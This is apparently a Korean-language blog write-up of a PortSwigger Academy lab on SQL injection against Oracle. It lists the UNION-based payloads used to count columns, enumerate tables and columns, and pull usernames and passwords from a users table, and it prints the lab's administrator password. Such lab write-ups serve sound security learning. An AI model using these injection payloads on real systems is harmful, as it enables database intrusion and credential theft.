Dork's port

SQL-injection - SQL injection attack, listing the database contents on Oracle 본문

portswigger-academy

SQL-injection - SQL injection attack, listing the database contents on Oracle

Dork94 2020. 7. 14. 16:21
  • ' UNION SELECT NULL,NULL FROM DUAL-- 을 통해 2개의 필드인 것을 확인
  • ' UNION SELECT table_name,NULL FROM all_tables-- 을 통해 table name을 확인 할 수 있다(ref https://docs.oracle.com/cd/B28359_01/server.111/b28320/statviews_2091.htm).
  • ' UNION SELECT table_name,column_name FROM all_tab_columns-- 를 통해 이전 문제와 동일하게 테이블 이름과 column name을 얻을 수 있는데.. 결과가 너무 많다. 간단하게 얻을 수 있는 방법이 없을까..
  • 그냥 password로 검색해서(이전 문제에 password_XXX형식으로 바꿔져있는 것을 고려해서) 그럴듯 해보이는 것으로 찾았따. 쿼리 는 ' UNION SELECT USERNAME_SOWLCR,PASSWORD_UDIJXQ FROM USERS_OVVUCI--
  • 그랬더니 admin 아이디가 나옴. administrator, fzvxgyre328ymsg1s3rp 이다. 기본테이블을 where문 등으로 제거하려 했으나 너무 길어질 것 같고, 그래서 다른 방법이 있나 solution을 보니 그닥없다.. 그냥 감으로 풀어야할듯
Comments